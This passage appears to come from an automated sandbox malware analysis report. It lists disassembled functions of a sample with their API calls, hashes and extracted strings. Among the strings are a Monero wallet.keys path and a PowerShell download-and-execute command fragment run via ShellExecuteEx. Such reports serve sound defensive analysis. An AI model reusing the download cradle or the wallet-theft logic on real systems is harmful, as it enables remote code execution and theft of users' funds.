                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: >=l$>=l
                                  • API String ID: 1378416451-2925468272
                                  • Opcode ID: 01ffccc19f9223ec88c9f8bd04d26ed46e688d81f032626f641740abc999f7b8
                                  • Instruction ID: dbb967a2ea1c3e7dc4fb89b87747d2f6e9d19738531ac4c839f24b30b66dfa61
                                  • Opcode Fuzzy Hash: 01ffccc19f9223ec88c9f8bd04d26ed46e688d81f032626f641740abc999f7b8
                                  • Instruction Fuzzy Hash: F6F01D35E18208ABDB14DBF0DC49F9AB7BAAB48710F20C558FA11A7280D67496019B50
                                  Function 006C4300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 006C4325
                                  • RegOpenKeyExA.ADVAPI32(80000001,0147DAA0,00000000,00020119,?), ref: 006C4344
                                  • RegQueryValueExA.ADVAPI32(?,0147E5D8,00000000,00000000,00000000,000000FF), ref: 006C4368
                                  • RegCloseKey.ADVAPI32(?), ref: 006C4372
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C4397
                                  • lstrcat.KERNEL32(?,0147E488), ref: 006C43AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 43f793bef55e593054f1c939943c8ae1dd8c4c4439cbbd6e0a952ec88cfa51ad
                                  • Instruction ID: 1bb407c2f747368bafc325c0cc918dc566246abccd48c150b503c9cf455df19d
                                  • Opcode Fuzzy Hash: 43f793bef55e593054f1c939943c8ae1dd8c4c4439cbbd6e0a952ec88cfa51ad
                                  • Instruction Fuzzy Hash: D041A7F79101086BDB24EBA0EC56FFE733DAB88700F40455CB7165B181EE759A888BE1
                                  Function 006BA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                  • ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                  • LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                  • CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 1a2f78109d9b189bd302f1c4328c8e6360b519b66c6d6d42b553f12948b813a0
                                  • Instruction ID: 65ceebc6681282bd5b5cc8d2fd22f3f2514427f345acb34f6243a7e67907d00a
                                  • Opcode Fuzzy Hash: 1a2f78109d9b189bd302f1c4328c8e6360b519b66c6d6d42b553f12948b813a0
                                  • Instruction Fuzzy Hash: DC31FAB4A14209EFDB14CFE4D885BEEB7B6AF48304F108158E911A7390D774AA81DFA1
                                  Function 006CCB7E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: 37bc1c2909e935e3956a1c3bbfe9ee8929741e7faa2ac1192c06259cbbb40357
                                  • Instruction ID: 339ad56a415e5fc3f8662ab280cad5c1beb95e389ee9c86c20c9e8830b966db1
                                  • Opcode Fuzzy Hash: 37bc1c2909e935e3956a1c3bbfe9ee8929741e7faa2ac1192c06259cbbb40357
                                  • Instruction Fuzzy Hash: B541E3B010079C9EDB218B24CC85FFBBBEAEB45714F1444ECE98E96182E2719A459F64
                                  Function 006C49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,0147E518), ref: 006C4A2B
                                    • Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C4A51
                                  • lstrcat.KERNEL32(?,?), ref: 006C4A70
                                  • lstrcat.KERNEL32(?,?), ref: 006C4A84
                                  • lstrcat.KERNEL32(?,0146BAB8), ref: 006C4A97
                                  • lstrcat.KERNEL32(?,?), ref: 006C4AAB
                                  • lstrcat.KERNEL32(?,0147DA00), ref: 006C4ABF
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006C8F20: GetFileAttributesA.KERNEL32(00000000,?,006B1B94,?,?,006D577C,?,?,006D0E22), ref: 006C8F2F
                                    • Part of subcall function 006C47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006C47D0
                                    • Part of subcall function 006C47C0: RtlAllocateHeap.NTDLL(00000000), ref: 006C47D7
                                    • Part of subcall function 006C47C0: wsprintfA.USER32 ref: 006C47F6
                                    • Part of subcall function 006C47C0: FindFirstFileA.KERNEL32(?,?), ref: 006C480D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 44abc5c60d3ee3e35531678a6cfd1c38ce36c354318436322498f3671174adf4
                                  • Instruction ID: ede6831e7ad6394619204606fad9bde206bdd23fe208a2200c6b2f0e6b4448e1
                                  • Opcode Fuzzy Hash: 44abc5c60d3ee3e35531678a6cfd1c38ce36c354318436322498f3671174adf4
                                  • Instruction Fuzzy Hash: 123150F29042086BCB64EBB0DC99FED7339EB48700F40458DB25696151EE74EAC8CB98
                                  Function 006C2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 006C2FD5
                                  Strings
                                  • <, xrefs: 006C2F89
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 006C2F14
                                  • ')", xrefs: 006C2F03
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 006C2F54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: cb3b13f7229401c0fa7e073661fb276f6602a250ecea9f447dfcf84b91fc2b72
                                  • Instruction ID: b3fba601c116af789b9c27d85aaf8f63291d402d8db3043b47895f4fccf3f959
                                  • Opcode Fuzzy Hash: cb3b13f7229401c0fa7e073661fb276f6602a250ecea9f447dfcf84b91fc2b72
                                  • Instruction Fuzzy Hash: BE41D871D1020C9ADB54EBE0C8A2FFDBB7AEF14304F40455DE116AA192EF706A49CF99
                                  Function 0072CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                  • String ID:
                                  • API String ID: 3136044242-0
                                  • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction ID: 85b000c856ac6bce3d7a29be5ccd86c683127b6e3a8b1efb36d97876565a1b37
                                  • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction Fuzzy Hash: 3B218E72D00678EBDB239F55ED4596F3A69EBA5B90F054119F80967211C3388D819BF0
                                  Function 006C6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 006C6C0C
                                  • sscanf.NTDLL ref: 006C6C39
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006C6C52
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006C6C60
                                  • ExitProcess.KERNEL32 ref: 006C6C7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 5d73907bd9eeb059396641d6bd863b6d127a5abc4fdaa4fc613cc08f52ed8970
                                  • Instruction ID: 33b40984d78d7e20cd98f82b726dd3407c80fb81836935c2e6c9e66cdd64a078
                                  • Opcode Fuzzy Hash: 5d73907bd9eeb059396641d6bd863b6d127a5abc4fdaa4fc613cc08f52ed8970
                                  • Instruction Fuzzy Hash: EF21BC75D14208ABCB44EFE4E845EEEB7B6FF48300F14856EF516A3250EB349604CB69
                                  Function 006C7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7FC7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C7FCE
                                  • RegOpenKeyExA.ADVAPI32(80000002,0146C048,00000000,00020119,?), ref: 006C7FEE
                                  • RegQueryValueExA.ADVAPI32(?,0147DAC0,00000000,00000000,000000FF,000000FF), ref: 006C800F
                                  • RegCloseKey.ADVAPI32(?), ref: 006C8022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 3d4c4d1fd4cc25de7a096e16195f55c8a5826961d489f1ea03e534ab5aedda1f
                                  • Instruction ID: b3844285600ee987bf3e466073d24877a8f849733317b47b176bc02b3fae8d95
                                  • Opcode Fuzzy Hash: 3d4c4d1fd4cc25de7a096e16195f55c8a5826961d489f1ea03e534ab5aedda1f
                                  • Instruction Fuzzy Hash: F3114CB1A58205AFE710CFD4DD89FBBBBB9EB44B10F204119F615AB380D77599009BA1
                                  Function 006C93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(0147E2F0,00000000,00000000,?,006B9F71,00000000,0147E2F0,00000000), ref: 006C93FC
                                  • lstrcpyn.KERNEL32(00987580,0147E2F0,0147E2F0,?,006B9F71,00000000,0147E2F0), ref: 006C9420
                                  • lstrlen.KERNEL32(00000000,?,006B9F71,00000000,0147E2F0), ref: 006C9437
                                  • wsprintfA.USER32 ref: 006C9457
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 4eb3e70ba4b83afe742177874165be4facf925757e1c5b4b0adc886dc8269449
                                  • Instruction ID: 2c435526e7a4c2d2e9ec67b709ff37f166120eaab1b554698e85084fbbb8af3f
